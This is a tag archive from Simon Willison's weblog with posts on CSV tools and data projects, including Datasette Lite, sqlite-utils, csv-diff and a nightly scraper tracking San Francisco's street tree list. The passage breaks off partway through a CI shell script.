Simon Willison's Weblog: csv

Papa Parse

2024-03-20T00:53:29+00:00

I’ve been trying out this JavaScript library for parsing CSV and TSV data today and I’m very impressed. It’s extremely fast, has all of the advanced features I want (streaming support, optional web workers, automatically detecting delimiters and column types), has zero dependencies and weighs just 19KB minified—6.8KB gzipped.

The project is 11 years old now. It was created by Matt Holt, who later went on to create the Caddy web server. Today it’s maintained by Sergi Almacellas Abellana.

Via mholt/PapaParse

Tags: csv, javascript, matt-holt

Introducing sqlite-xsv: The Fastest CSV Parser for SQLite

2023-01-14T21:54:05+00:00

Introducing sqlite-xsv: The Fastest CSV Parser for SQLite

Alex Garcia continues to push the boundaries of SQLite extensions. This new extension in Rust wraps the lightning fast Rust csv crate and provides a new csv_reader() virtual table that can handle regular, gzipped and zstd compressed files.

Tags: csv, rust, sqlite, alex-garcia, zstd

Joining CSV files in your browser using Datasette Lite

2022-06-20T21:20:16+00:00

I added a new feature to Datasette Lite - my version of Datasette that runs entirely in your browser using WebAssembly (previously): you can now use it to load one or more CSV files by URL, and then run SQL queries against them - including joins across data from multiple files.

Your CSV file needs to be hosted somewhere with access-control-allow-origin: * CORS headers. Any CSV file hosted on GitHub provides these, if you use the link you get by clicking on the "Raw" version.

Loading CSV data from a URL

Here's the URL to a CSV file of college fight songs collected by FiveThirtyEight in their data repo as part of the reporting for this story a few years ago:

https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv

You can pass this to Datasette Lite in two ways:

You can load the web app, click the "Load data by URL to a CSV file" button and paste in the URL
Or you can pass it as a ?csv= parameter to the application, like this: https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv

Once Datasette has loaded, a data database will be available with a single table called fight-songs.

As you navigate around in Datasette the URL bar will update to reflect current state - which means you can deep-link to table views with applied filters and facets:

https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data/fight-songs?_facet=conference&_facet=student_writer&_facet=official_song

Or even link to the result of a custom SQL query:

https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data?sql=select+school%2C+conference%2C+song_name%2C+writers%2C+year%2C+student_writer+spotify_id+from+%5Bfight-songs%5D+order+by+rowid+limit+101

Loading multiple files and joining data

You can pass the ?csv= parameter more than once to load data from multiple CSV files into the same virtual data database. Each CSV file will result in a separate table.

For this demo I'll use two CSV files.

The first is us-counties-recent.csv from the NY Times covid-19-data repository, which lists the most recent numbers for Covid cases for every US county.

The second is us_census_county_populations_2019.csv, a CSV file listing the population of each county according to the 2019 US Census which I extracted from this page on the US Census website.

Both of those tables include a column called fips, representing the FIPS county code for each county. These 4-5 digit codes are ideal for joining the two tables.

Here's a SQL query which joins the two tables, filters for the data for the most recent date represented (using where date = (select max(date) from [us-counties-recent])) and calculates cases_per_million using the cases and the population:

select
  [us-counties-recent].*,
  us_census_county_populations_2019.population,
  1.0 * [us-counties-recent].cases / us_census_county_populations_2019.population * 1000000 as cases_per_million
from
  [us-counties-recent]
  join us_census_county_populations_2019 on us_census_county_populations_2019.fips = [us-counties-recent].fips
where
  date = (select max(date) from [us-counties-recent])
order by
  cases_per_million desc

And since everything in Datasette Lite can be bookmarked, here's the super long URL (clickable version here) that executes that query against those two CSV files:

https://lite.datasette.io/?csv=https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties-recent.csv&csv=https://raw.githubusercontent.com/simonw/covid-19-datasette/main/us_census_county_populations_2019.csv#/data?sql=select%0A++%5Bus-counties-recent%5D.*%2C%0A++us_census_county_populations_2019.population%2C%0A++1.0+*+%5Bus-counties-recent%5D.cases+%2F+us_census_county_populations_2019.population+*+1000000+as+cases_per_million%0Afrom%0A++%5Bus-counties-recent%5D%0A++join+us_census_county_populations_2019+on+us_census_county_populations_2019.fips+%3D+%5Bus-counties-recent%5D.fips%0Awhere%0A++date+%3D+%28select+max%28date%29+from+%5Bus-counties-recent%5D%29%0Aorder+by%0A++cases_per_million+desc

Tags: csv, projects, sql, datasette, webassembly, datasette-lite

Joining CSV and JSON data with an in-memory SQLite database

2021-06-19T22:55:57+00:00

The new sqlite-utils memory command can import CSV and JSON data directly into an in-memory SQLite database, combine and query it using SQL and output the results as CSV, JSON or various other formats of plain text tables.

sqlite-utils memory

The new feature is part of sqlite-utils 3.10, which I released this morning. You can install it using brew install sqlite-utils or pip install sqlite-utils.

I've recorded this video demonstrating the new feature - with full accompanying notes below.

sqlite-utils already offers a mechanism for importing CSV and JSON data into a SQLite database file, in the form of the sqlite-utils insert command. Processing data with this involves two steps: first import it into a temp.db file, then use sqlite-utils query to run queries and output the results.

Using SQL to re-shape data is really useful - since sqlite-utils can output in multiple different formats, I frequently find myself loading in a CSV file and exporting it back out as JSON, or vice-versa.

This week I realized that I had most of the pieces in place to reduce this to a single step. The new sqlite-utils memory command (full documentation here) operates against a temporary, in-memory SQLite database. It can import data, execute SQL and output the result in a one-liner, without needing any temporary database files along the way.

Here's an example. My Dogsheep GitHub organization has a number of repositories. GitHub make those available via an authentication-optional API endpoint at https://api.github.com/users/dogsheep/repos - which returns JSON that looks like this (simplified):

[
  {
    "id": 197431109,
    "name": "dogsheep-beta",
    "full_name": "dogsheep/dogsheep-beta",
    "size": 61,
    "stargazers_count": 79,
    "watchers_count": 79,
    "forks": 0,
    "open_issues": 11
  },
  {
    "id": 256834907,
    "name": "dogsheep-photos",
    "full_name": "dogsheep/dogsheep-photos",
    "size": 64,
    "stargazers_count": 116,
    "watchers_count": 116,
    "forks": 5,
    "open_issues": 18
  }
]

With sqlite-utils memory we can see the 3 most popular repos by number of stars like this:

$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' -t
full_name                     forks_count    stars
--------------------------  -------------  -------
dogsheep/twitter-to-sqlite             12      225
dogsheep/github-to-sqlite              14      139
dogsheep/dogsheep-photos                5      116

We're using curl to fetch the JSON and pipe it into sqlite-utils memory - the - means "read from standard input". Then we pass the following SQL query:

select full_name, forks_count, stargazers_count as stars
from stdin order by stars desc limit 3

stdin is the temporary table created for the data piped in to the tool. The query selects three of the JSON properties, renames stargazers_count to stars, sorts by stars and return the first three.

The -t option here means "output as a formatted table" - without that option we get JSON:

$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    '  
[{"full_name": "dogsheep/twitter-to-sqlite", "forks_count": 12, "stars": 225},
 {"full_name": "dogsheep/github-to-sqlite", "forks_count": 14, "stars": 139},
 {"full_name": "dogsheep/dogsheep-photos", "forks_count": 5, "stars": 116}]

Or we can use --csv to get back CSV:

$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' --csv
full_name,forks_count,stars
dogsheep/twitter-to-sqlite,12,225
dogsheep/github-to-sqlite,14,139
dogsheep/dogsheep-photos,5,116

The -t option supports a number of different formats, specified using --fmt. If I wanted to generate a LaTeX table of the top repos by stars I could do this:

$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' -t --fmt=latex
\begin{tabular}{lrr}
\hline
 full\_name                  &   forks\_count &   stars \\
\hline
 dogsheep/twitter-to-sqlite &            12 &     225 \\
 dogsheep/github-to-sqlite  &            14 &     139 \\
 dogsheep/dogsheep-photos   &             5 &     116 \\
\hline
\end{tabular}

We can run aggregate queries too - let's add up the total size and total number of stars across all of those repositories:

$ curl -s 'https://api.github.com/users/dogsheep/repos' \
| sqlite-utils memory - '
    select sum(size), sum(stargazers_count) from stdin
' -t
  sum(size)    sum(stargazers_count)
-----------  -----------------------
        843                      934

(I believe size here is measured in kilobytes: the GitHub API documentation isn't clear on this point.)

Joining across different files

All of these examples have worked with JSON data piped into the tool - but you can also pass one or more files, of different formats, in a way that lets you execute joins against them.

As an example, let's combine two sources of data.

The New York Times publish a us-states.csv file with Covid cases and deaths by state over time.

The CDC have an undocumented JSON endpoint (which I've been archiving here) tracking the progress of vaccination across different states.

We're going to run a join from that CSV data to that JSON data, and output a table of results.

First, we need to download the files. The CDC JSON data isn't quite in the right shape for our purposes:

{
  "runid": 2023,
  "vaccination_data": [
    {
      "Date": "2021-06-19",
      "Location": "US",
      "ShortName": "USA",
      ...

sqlite-utils expects a flat JSON array of objects - we can use jq to re-shape the data like so:

$ curl https://covid.cdc.gov/covid-data-tracker/COVIDData/getAjaxData?id=vaccination_data \
  | jq .vaccination_data > vaccination_data.json

The New York Times data is good as is:

$ wget 'https://github.com/nytimes/covid-19-data/raw/master/us-states.csv'

Now that we have the data locally, we can run a join to combine it using the following command:

$ sqlite-utils memory us-states.csv vaccination_data.json "
  select
    max(t1.date),
    t1.state,
    t1.cases,
    t1.deaths,
    t2.Census2019,
    t2.Dist_Per_100K
  from
    t1
      join t2 on t1.state = replace(t2.LongName, 'New York State', 'New York')
  group by
    t1.state
  order by
    Dist_Per_100K desc
" -t
max(t1.date)    state                       cases    deaths    Census2019    Dist_Per_100K
--------------  ------------------------  -------  --------  ------------  ---------------
2021-06-18      District of Columbia        49243      1141        705749           149248
2021-06-18      Vermont                     24360       256        623989           146257
2021-06-18      Rhode Island               152383      2724       1059361           141291
2021-06-18      Massachusetts              709263     17960       6892503           139692
2021-06-18      Maryland                   461852      9703       6045680           138193
2021-06-18      Maine                       68753       854       1344212           136894
2021-06-18      Hawaii                      35903       507       1415872           136024
...

I'm using automatically created numeric aliases t1 and t2 for the files here, but I can also use their full table names "us-states" (quotes needed due to the hyphen) and vaccination_data instead.

The replace() operation there is needed because the vaccination_data.json file calls New York "New York State" while the us-states.csv file just calls it "New York".

The max(t1.date) and group by t1.state is a useful SQLite trick: if you perform a group by and then ask for the max() of a value, the other columns returned from that table will be the columns for the row that contains that maximum value.

This demo is a bit of a stretch - once I reach this level of complexity I'm more likely to load the files into a SQLite database file on disk and open them up in Datasette - but it's a fun example of a more complex join in action.

Also in sqlite-utils 3.10

The sqlite-utils memory command has another new trick up its sleeve: it automatically detects which columns in a CSV or TSV file contain integer or float values and creates the corresponding in-memory SQLite table with the correct types. This ensures max() and sum() and order by work in a predictable manner, without accidentally sorting 1 as higher than 11.

I didn't want to break backwards compatibility for existing users of the sqlite-utils insert command so I've added type detection there as a new option, --detect-types or -d for short:

$ sqlite-utils insert my.db us_states us-states.csv --csv -d
  [####################################]  100%
$ sqlite-utils schema my.db
CREATE TABLE "us_states" (
   [date] TEXT,
   [state] TEXT,
   [fips] INTEGER,
   [cases] INTEGER,
   [deaths] INTEGER
);

There's more in the changelog.

Releases this week

sqlite-utils: 3.10 - (78 releases total) - 2021-06-19
Python CLI utility and library for manipulating SQLite databases
dogsheep-beta: 0.10.2 - (20 releases total) - 2021-06-13
Build a search index across content from multiple SQLite database tables and run faceted searches against it using Datasette
yaml-to-sqlite: 1.0 - (5 releases total) - 2021-06-13
Utility for converting YAML files to SQLite
markdown-to-sqlite: 1.0 - (2 releases total) - 2021-06-13
CLI tool for loading markdown files into a SQLite database

TIL this week

Mouse support in vim

Tags: csv, json, projects, sql, sqlite, weeknotes, sqlite-utils

Weeknotes: Vaccinate The States, and how I learned that returning dozens of MB of JSON works just fine these days

2021-04-26T01:02:22+00:00

On Friday VaccinateCA grew in scope, a lot: we launched a new website called Vaccinate The States. Patrick McKenzie wrote more about the project here - the short version is that we're building the most comprehensive possible dataset of vaccine availability in the USA, using a combination of data collation, online research and continuing to make a huge number of phone calls.

VIAL, the Django application I've been working on since late February, had to go through some extensive upgrades to help support this effort!

VIAL has a number of responsibilities. It acts as our central point of truth for the vaccination locations that we are tracking, powers the app used by our callers to serve up locations to call and record the results, and as-of this week it's also a central point for our efforts to combine data from multiple other providers and scrapers.

The data ingestion work is happening in a public repository, CAVaccineInventory/vaccine-feed-ingest. I have yet to write a single line of code there (and I thoroughly enjoy working on that kind of code) because I've been heads down working on VIAL itself to ensure it can support the ingestion efforts.

Matching and concordances

If you're combining data about vaccination locations from a range of different sources, one of the biggest challenges is de-duplicating the data: it's important the same location doesn't show up multiple times (potentially with slightly differing details) due to appearing in multiple sources.

Our first step towards handling this involved the addition of "concordance identifiers" to VIAL.

I first encountered the term "concordance" being used for this in the Who's On First project, which is building a gazetteer of every city/state/country/county/etc on earth.

A concordance is an identifier in another system. Our location ID for RITE AID PHARMACY 05976 in Santa Clara is receu5biMhfN8wH7P - which is e3dfcda1-093f-479a-8bbb-14b80000184c in VaccineFinder and 7537904 in Vaccine Spotter and ChIJZaiURRPKj4ARz5nAXcWosUs in Google Places.

We're storing them in a Django table called ConcordanceIdentifier: each record has an authority (e.g. vaccinespotter_org) and an identifier (7537904) and a many-to-many relationship to our Location model.

Why many-to-many? Surely we only want a single location for any one of these identifiers?

Exactly! That's why it's many-to-many: because if we import the same location twice, then assign concordance identifiers to it, we can instantly spot that it's a duplicate and needs to be merged.

Raw data from scrapers

ConcordanceIdentifier also has a many-to-many relationship with a new table, called SourceLocation. This table is essentially a PostgreSQL JSON column with a few other columns (including latitude and longitude) into which our scrapers and ingesters can dump raw data. This means we can use PostgreSQL queries to perform all kinds of analysis on the unprocessed data before it gets cleaned up, de-duplicated and loaded into our point-of-truth Location table.

How to dedupe and match locations?

Initially I thought we would do the deduping and matching inside of VIAL itself, using the raw data that had been ingested into the SourceLocation table.

Since we were on a tight internal deadline it proved more practical for people to start experimenting with matching code outside of VIAL. But that meant they needed the raw data - 40,000+ location records (and growing rapidly).

A few weeks ago I built a CSV export feature for the VIAL admin screens, using Django's StreamingHttpResponse class combined with keyset pagination for bulk export without sucking the entire table into web server memory - details in this TIL.

Our data ingestion team wanted a GeoJSON export - specifically newline-delimited GeoJSON - which they could then load into GeoPandas to help run matching operations.

So I built a simple "search API" which defaults to returning 20 results at a time, but also has an option to "give me everything" - using the same technique I used for the CSV export: keyset pagination combined with a StreamingHttpResponse.

And it worked! It turns out that if you're running on modern infrastructure (Cloud Run and Cloud SQL in our case) in 2021 getting Django to return 50+MB of JSON in a streaming response works just fine.

Some of these exports are taking 20+ seconds, but for a small audience of trusted clients that's completely fine.

While working on this I realized that my idea of what size of data is appropriate for a dynamic web application to return more or less formed back in 2005. I still think it's rude to serve multiple MBs of JavaScript up to an inexpensive mobile phone on an expensive connection, but for server-to-server or server-to-automation-script situations serving up 50+ MB of JSON in one go turns out to be a perfectly cromulent way of doing things.

Export full results from django-sql-dashboard

django-sql-dashboard is my Datasette-inspired library for adding read-only arbitrary SQL queries to any Django+PostgreSQL application.

I built the first version last month to help compensate for switching VaccinateCA away from Airtable - one of the many benefits of Airtable is that it allows all kinds of arbitrary reporting, and Datasette has shown me that bookmarkable SQL queries can provide a huge amount of that value with very little written code, especially within organizations where SQL is already widely understood.

While it allows people to run any SQL they like (against a read-only PostgreSQL connection with a time limit) it restricts viewing to the first 1,000 records to be returned - because building robust, performant pagination against arbitrary SQL queries is a hard problem to solve.

Today I released django-sql-dashboard 0.10a0 with the ability to export all results for a query as a downloadable CSV or TSV file, using the same StreamingHttpResponse technique as my Django admin CSV export and all-results-at-once search endpoint.

I expect it to be pretty useful! It means I can run any SQL query I like against a Django project and get back the full results - often dozens of MBs - in a form I can import into other tools (including Datasette).

TIL this week

Releases this week

django-sql-dashboard: 0.10a1 - (21 total releases) - 2021-04-25
Django app for building dashboards using raw SQL queries

Tags: csv, django, projects, vaccines, weeknotes, vaccinate-ca, django-sql-dashboard

Weeknotes: Mostly messing around with map tiles

2021-02-07T05:53:19+00:00

Most of what I worked on this week was covered in Serving map tiles from SQLite with MBTiles and datasette-tiles. I built two new plugins: datasette-tiles for serving map tiles, and datasette-basemap which bundles map tiles for zoom levels 0-6 of OpenStreetMap. I also released download-tiles for downloading tiles and bundling them into an MBTiles database.

sqlite-utils 3.4.1

I added one new feature to sqlite-utils: the sqlite-utils import command can now be configured to read CSV files using alternative delimiters, by passing the --delimiter option or the --quotechar option.

This is covered in the documentation, which provides the following example:

name;description
Cleo;|Very fine; a friendly dog|
Pancakes;A local corgi

Imported using:

sqlite-utils insert dogs.db dogs dogs.csv \
  --delimiter=";" --quotechar="|"

Datasette 0.54.1

I spotted a subtle but nasty regression in Datasette: a change I made to how hidden form fields worked on the table page meant that clearing the _search search input and re-submitting the form didn't take effect, and the search would persist. Datasette 0.54.1 fixes that bug.

Releases this week

datasette-jellyfish: 1.0.1 - 2021-02-06
Datasette plugin adding SQL functions for fuzzy text matching powered by Jellyfish
sqlite-utils: 3.4.1 - 2021-02-06
Python CLI utility and library for manipulating SQLite databases
datasette-tiles: 0.5 - 2021-02-04
Mapping tile server for Datasette, serving tiles from MBTiles packages
download-tiles: 0.4 - 2021-02-03
Download map tiles and store them in an MBTiles database
datasette-basemap: 0.2 - 2021-02-02
A basemap for Datasette and datasette-leaflet
datasette: 0.54.1 - 2021-02-02
An open source multi-tool for exploring and publishing data
datasette-cluster-map: 0.17.1 - 2021-02-01
Datasette plugin that shows a map for any data with latitude/longitude columns
datasette-leaflet: 0.2.2 - 2021-02-01
Datasette plugin adding the Leaflet JavaScript library

TIL this week

Tags: csv, projects, datasette, weeknotes, sqlite-utils

CSVs: The good, the bad, and the ugly

2020-11-05T17:19:05+00:00

CSVs: The good, the bad, and the ugly

Useful, thoughtful summary of the pros and cons of the most common format for interchanging data.

Via @alex_gaynor

Tags: csv, alex-gaynor

Weeknotes: Datasette Writes

2020-02-26T06:34:46+00:00

As discussed previously, the biggest hole in Datasette's feature set at the moment involves writing to the database.

Datasette was born as a hack to abuse serverless, stateless hosting by bundling a static, immutable database as part of the deployment. The key idea was that for some use-cases - such as data journalism - you don't need to be able to continually update your data. It's just the facts that support the story you are trying to tell.

I also believed the conventional wisdom that SQLite is fine for reads but shouldn't be trusted to handle web application writes. I no longer believe this to be the case: SQLite is great at handling writes, as millions of iPhone and Android apps will attest.

Meanwhile, the biggest blocker to people trying out Datasette is that they would need to convert their data to SQLite somehow in order to use it. I've been building a family of CLI tools for this, but that requires users to both be familiar with the command-line and to install software on their computers.

So: Datasette needs to grow web-based tools for loading data into the database.

Datasette's plugin system is the ideal space for experimenting with ways of doing this, without needing to try out crazy new features on Datasette's own core.

There's just one big problem: SQLite may be great at fast, reliable writes but it still doesn't like concurrent writes: it's important to only ever have one connection writing to a SQLite database at a time.

I've been mulling over the best way to handle this for the best part of a year... and then a couple of days ago I had a breakthrough: with a dedicated write thread for a database file, I could use a Python queue to ensure only one write could access the database at a time.

There's prior art for this: SQLite wizard Charles Leifer released code plus a beautiful explanation of how to queue writes to SQLite back in 2017. I'm not sure why I didn't settle on his approach sooner.

So... Datasette 0.37, released this evening, has a new capability exposed to plugins: they can now request that an operation (either a SQL statement or a full custom Python function) be queued up to execute inside a thread that posesses an exclusive write connection to a SQLite database.

I've documented how plugins can use this in the new plugin internals documentation: execute_write() and execute_write_fn().

So far there's only one public plugin that takes advantage of this: datasette-upload-csvs, which previously used a dirty hack but has now been upgraded to use the new execute_write_fn() method.

I'm really excited about the potential plugins this unlocks though. I experimented with a logging plugin and a plugin for deleting tables while I was building the hooks (full implementations of those are posted as comments in the pull request).

Other use-cases I'm interested to explore include:

Plugins that import data from other APIs or services. Imagine web UI interfaces to some of my Dogsheep tools for example.
Plugins that periodically update data - pulling the latest CSV updates from government open data portals (like San Francisco's trees).
Tools for enhancing tables with additional data derived from their values - geocoding or reverse geocoding columns, resolving identifiers and so on.
Now that plugins have a tool for maintaining their own state, plugins could use SQLite tables to track things like which saved searches have been executed.
A plugin that lets you attach annotations to rows and columns in other tables, storing those annotations in its own SQLite database.

Tags: csv, plugins, sqlite, threads, datasette, weeknotes

Weeknotes: Datasette Cloud and zero downtime deployments

2020-01-21T20:56:46+00:00

Yesterday's piece on Tracking FARA by deploying a data API using GitHub Actions and Cloud Run was originally intended to be my weeknotes, but ended up getting a bit too involved.

Aside from playing with GitHub Actions and Cloud Run, my focus over the past week has been working on Datasette Cloud. Datasette Cloud is the current name I'm using for my hosted Datasette product - the idea being that I'll find it a lot easier to get feedback on Datasette from journalists if they can use it without having to install anything!

My MVP for Datasette Cloud is that I can use it to instantly provision a new, private Datasette instance for a journalist (or team of journalists) that they can then sign into, start playing with and start uploading their data to (initially as CSV files).

I have to solve quite a few problems to get there:

Secure, isolated instances of Datasette. A team or user should only be able to see their own files. I plan to solve this using Docker containers that are mounted such that they can only see their own dedicated volumes.
The ability to provision new instances as easily as possible - and give each one its own HTTPS subdomain.
Authentication: users need to be able to register and sign in to accounts. I could use datasette-auth-github for this but I'd like to be able to support regular email/password accounts too.
Users need to be able to upload CSV files and have them converted into a SQLite database compatible with Datasette.

Zero downtime deployments

I have a stretch goal which I'm taking pretty seriously: I want to have a mechanism in place for zero-downtime deployments of new versions of the software.

Arguable this is an unneccessary complication for an MVP. I may not fully implement it, but I do want to at least know that the path I've taken is compatible with zero downtime deployments.

Why do zero downtime deployments matter so much to me? Because they are desirable for rapid iteration, and crucial for setting up continuious deployment. Even a couple of seconds of downtime during a deployment leaves a psychological desire not to deploy too often. I've seen the productivity boost that deploying fearlessly multiple times a day brings, and I want it.

So I've been doing a bunch of research into zero downtime deployment options (thanks to some great help on Twitter) and I think I have something that's going to work for me.

The first ingredient is Traefik - a new-to-me edge router (similar to nginx) which has a delightful focus on runtime configuration based on automatic discovery.

It works with a bunch of different technology stacks, but I'm going to be using it with regular Docker. Traefik watches for new Docker containers, reads their labels and uses that to reroute traffic to them.

So I can launch a new Docker container, apply the Docker label "traefik.frontend.rule": "Host:subdomain.mydomain.com" and Traefik will start proxying traffic to that subdomain directly to that container.

Traefik also has extremely robust built-in support for Lets Encrypt to issue certificates. I managed to issue a wildcard TLS certificate for my entire domain, so new subdomains are encrypted straight away. This did require me to give Traefik API access to modify DNS entries - I'm running DNS for this project on Digital Ocean and thankfully Traefik knows how to do this by talking to their API.

That solves provisioning: when I create a new account I can call the Docker API (from Python) to start up a new, labelled container on a subdomain protected by a TLS certificate.

I still needed a way to run a zero-downtime deployment of a new container (for example when I release a new version of Datasette and want to upgrade everyone). After quite a bit of research (during which I discovered you can't modify the labels on a Docker container without restarting it) I settled on the approach described in this article.

Essentially you configure Traefik to retry failed requests, start a new, updated container with the same routing information as the existing one (causing Traefik to load balance HTTP requests across both), then shut down the old container and trust Traefik to retry in-flight requests against the one that's still running.

Rudimentary testing with ab suggested that this is working as desired.

One remaining problem: if Traefik is running in a Docker container and proxying all of my traffic, how can I upgrade Traefik itself without any downtime?

Consensus on Twitter seems to be that Docker on its own doesn't have a great mechanism for this (I was hoping I could re-route port 80 traffic to the host to a different container in an atomic way). But... iptables has mechanisms that can re-route traffic from one port to another - so I should be able to run a new Traefik container on a different port and re-route to it at the operating system level.

That's quite enough yak shaving around zero time deployments for now!

datasette-upload-csvs

A big problem I'm seeing with the current Datasette ecosystem is that while Datasette offers a web-based user interface for querying and accessing data, the tools I've written for actually creating those databases are decidedly command-line only.

Telling journalists they have to learn to install and run software on the command-line is way too high a barrier to entry.

I've always intended to have Datasette plugins that can handle uploading and converting data. It's time to actually build one!

datasette-upload-csvs is what I've got so far. It has a big warning not to use it in the README - it's very alpha sofware at the moment - but it does prove that the concept can work.

It uses the asgi_wrapper plugin hook to intercept requests to the path /-/upload-csv and forward them on to another ASGI app, written using Starlette, which provides a basic upload form and then handles the upload.

Uploaded CSVs are converted to SQLite using sqlite-utils and written to the first mutable database attached to Datasette.

It needs a bunch more work (and tests) before I'm comfortable telling people to use it, but it does at least exist as a proof of concept for me to iterate on.

datasette-auth-django-cookies

No code for this yet, but I'm beginning to flesh it out as a concept.

I don't particularly want to implement user registration and authentication and cookies and password hashing. I know how to do it, which means I know it's not something you shuld re-roll for every project.

Django has a really well designed, robust authentication system. Can't I just use that?

Since all of my applications will be running on subdomains of a single domain, my current plan is to have a regular Django application which handles registration and logins. Each subdomain will then run a custom piece of Datasette ASGI middleware which knows how to read and validate the Django authentication cookie.

This should give me single sign-on with a single, audited codebase for registration and login with (hopefully) the least amount of work needed to integrate it with Datasette.

Code for this will hopefully follow over the next week.

Niche Museums - now publishing weekly

I hit a milestone with my Niche Museums project: the site now lists details of 100 museums!

For the 100th entry I decided to celebrate with by far the most rewarding (and exclusive) niche museum experience I've ever had: Ray Bandar's Bone Palace.

You should read the entry. The short version is that Ray Bandar collected 7,000 animals skulls over a sixty year period, and Natalie managed to score us a tour of his incredible basement mere weeks before the collection was donated to the California Academy of Sciences.

Posting one museum a day was taking increasingly more of my time, as I had to delve into the depths of my museums-I-have-visited backlog and do increasing amounts of research. Now that I've hit 100 I'm going to switch to publishing one a week, which should also help me visit new ones quickly enough to keep the backlog full!

So I only posted four this week:

The ruins of Llano del Rio in Los Angeles County
Cleveland Hungarian Museum in Cleveland
New Orleans Historic Voodoo Museum in New Orleans
Ray Bandar's Bone Palace in San Francisco

I also built a simple JavaScript image gallery to better display the 54 photos I published from our trip to Ray Bandar's basement.

Tags: csv, deployment, museums, projects, zero-downtime, docker, datasette, weeknotes, traefik, datasette-cloud, digitalocean

Dockerfile for creating a Datasette of NHS dentist information

2019-04-26T14:09:34+00:00

Dockerfile for creating a Datasette of NHS dentist information

Really neat Dockerfile example by Alf Eaton that uses multi-stage builds to pull dentist information from the NHS, compile to SQLite using csvs-to-sqlite and serve the results with Datasette. TIL the NHS like to use ¬ as their CSV separator!

Via @invisiblecomma

Tags: docker, alf-eaton, csv, datasette

tsv-utils

2019-04-07T20:29:38+00:00

tsv-utils

Powerful collection of CLI tools for processing TSV files, written in D for performance and released by eBay. Includes a csv2tsv conversion tool. You can download an archive of pre-built binaries for Linux and OS X from their releases page: worked fine on my Mac.

Via @jeffsonstein

Tags: csv

csv-diff 0.3.1

2019-04-07T20:03:20+00:00

csv-diff 0.3.1

I released a minor update to my csv-diff CLI tool today which does a better job of displaying a human-readable representation of rows that have been added or removed from a file—previously they were represented as an ugly JSON dump. My script monitoring changes to the official list of trees in San Francisco has been running for a month now and has captured 23 commits!

Via @simonw

Tags: projects, csv, diff

VisiData

2019-03-18T03:45:16+00:00

VisiData

Intriguing tool by Saul Pwanson: VisiData is a command-line "textpunk utility" for browsing and manipulating tabular data. pip3 install visidata and then vd myfile.csv (or .json or .xls or SQLite or others) and get an interactive terminal UI for quickly searching through the data, conducting frequency analysis of columns, manipulating it and much more besides. Two tips for if you start playing with it: hit gq to exit, and hit Ctrl+H to view the help screen.

Via @saulfp

Tags: csv, data-journalism, python, sqlite

Generating a commit log for San Francisco's official list of trees

2019-03-13T14:49:48+00:00

San Francisco has a neat open data portal (as do an increasingly large number of cities these days). For a few years my favourite file on there has been Street Tree List, a list of all 190,000 trees in the city maintained by the Department of Public Works.

I’ve been using that file for Datasette demos for a while now, but last week I noticed something intriguing: the file had been recently updated. On closer inspection it turns out it’s updated on a regular basis! I had assumed it was a static snapshot of trees at a certain point in time, but I was wrong: Street_Tree_List.csv is a living document.

Back in September 2017 I built a scraping project relating to hurricane Irma. The idea was to take data sources like FEMA’s list of open shelters and track them over time, by scraping them into a git repository and committing after every fetch.

I’ve been meaning to spend more time with this idea, and building a commit log for San Francisco’s trees looked like an ideal opportunity to do so.

sf-tree-history

Here’s the result: sf-tree-history, a git repository dedicated to recording the history of changes made to the official list of San Francisco’s trees. The repo contains three things: the latest copy of Street_Tree_List.csv, a README, and a Circle CI configuration that grabs a new copy of the file every night and, if it has changed, commits it to git and pushes the result to GitHub.

The most interesting part of the repo is the commit history itself. I’ve only been running the script for just over a week, but I already have some useful illustrative commits:

7ab432cdcb8d7914cfea4a5b59803f38cade532b from March 6th records three new trees added to the file: two Monterey Pines and a Blackwood Acacia.
d6b258959af9546909b2eee836f0156ed88cd45d from March 12th shows four changes made to existing records. Of particular interest: TreeID 235981 (a Cherry Plum) had its address updated from 412 Webster St to 410 Webster St and its latitude and longitude tweaked a little bit as well.
ca66d9a5fdd632549301d249c487004a5b68abf2 lists 2151 rows changed, 1280 rows added! I found an old copy of Street_Tree_List.csv on my laptop from April 2018, so for fun I loaded it into the repository and used git commit amend to back-date the commit to almost a year ago. I generated a commit message between that file and the version from 9 days ago which came in at around 10,000 lines of text. Git handled that just fine, but GitHub’s web view sadly truncates it.

csv-diff

One of the things I learned from my hurricane Irma project was the importance of human-readable commit messages that summarize the detected changes. I initially wrote some code to generate those by hand, but then realized that this could be extracted into a reusable tool.

The result is csv-diff, a tiny Python CLI tool which can generate a human (or machine) readable version of the differences between two CSV files.

Using it looks like this:

$ csv-diff one.csv two.csv --key=id
1 row added, 1 row removed, 1 row changed

1 row added

  {"id": "3", "name": "Bailey", "age": "1"}

1 row removed

  {"id": "2", "name": "Pancakes", "age": "2"}

1 row changed

  Row 1
    age: "4" => "5"

The csv-diff README has further details on the tool.

Circle CI

My favourite thing about the sf-tree-history project is that it costs me nothing to run - either in hosting costs or (hopefully) in terms of ongoing maintenance.

The git repository is hosted for free on GitHub. Because it’s a public project, Circle CI will run tasks against it for free.

My .circleci/config.yml does the rest. It uses Circle’s cron syntax to schedule a task that runs every night. The task then runs this script (embedded in the YAML configuration):

cp Street_Tree_List.csv Street_Tree_List-old.csv
curl -o Street_Tree_List.csv "https://data.sfgov.org/api/views/tkzw-k3nq/rows.csv?accessType=DOWNLOAD"
git add Street_Tree_List.csv
git config --global user.email "treebot@example.com"
git config --global user.name "Treebot"
sudo pip install csv-diff
csv-diff Street_Tree_List-old.csv Street_Tree_List.csv --key=TreeID > message.txt
git commit -F message.txt && \
